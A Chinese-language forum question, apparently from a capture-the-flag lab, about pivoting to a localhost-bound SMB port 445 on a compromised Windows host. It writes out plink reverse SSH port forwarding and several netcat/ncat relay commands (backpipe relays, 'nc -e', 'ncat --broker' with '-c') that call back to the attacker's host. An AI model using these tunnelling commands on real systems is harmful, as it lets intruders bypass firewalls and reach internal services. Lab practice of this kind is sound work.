通过绕过防火墙过滤尝试访问受害者计算机上的端口445。
受害者计算机的445端口正在侦听127.0.0.1,我想通过netcat中继访问该端口。
受害者:10.10.10.81和Windows 攻击:10.10.14.14和Linux
这是在Attacking上打开端口25555,并在受害者上转发到445端口。
我设法通过发送来自受害者的反向ssh连接,使用plink完成了这项任务。
plink.exe 10.10.14.14 -R 25555:127.0.0.1:445
但是我真的想尝试使用nc / Ncat来解决这个问题
在Linux(攻击)上,我已经运行:
nc -nlvp 80 0<backpipe | nc -nlvp 25555 1>backpipe
(即通过80上的nc侦听器在本地转发端口25555) 在另一个场合,我已经运行: ncat --broker -nlvp 25555
从受害者(Windows)运行:
echo 127.0.0.1 445 > relay.bat
nc 10.10.14.14 80 -e relay.bat
AND
echo 10.10.14.14 80 > relay.bat
nc 127.0.0.1 445 -e relay.bat
这些都不适合我。我怀疑我的问题在Windows端。
编辑:
此后我已经使用
完成了中继Linux : ncat --broker -nlvp 25555
Windows: ncat -v 10.10.14.14 25555 -c "ncat -v 127.0.0.1 445"
无论如何传输一些数据,隧道都会立即在Windows计算机上退出。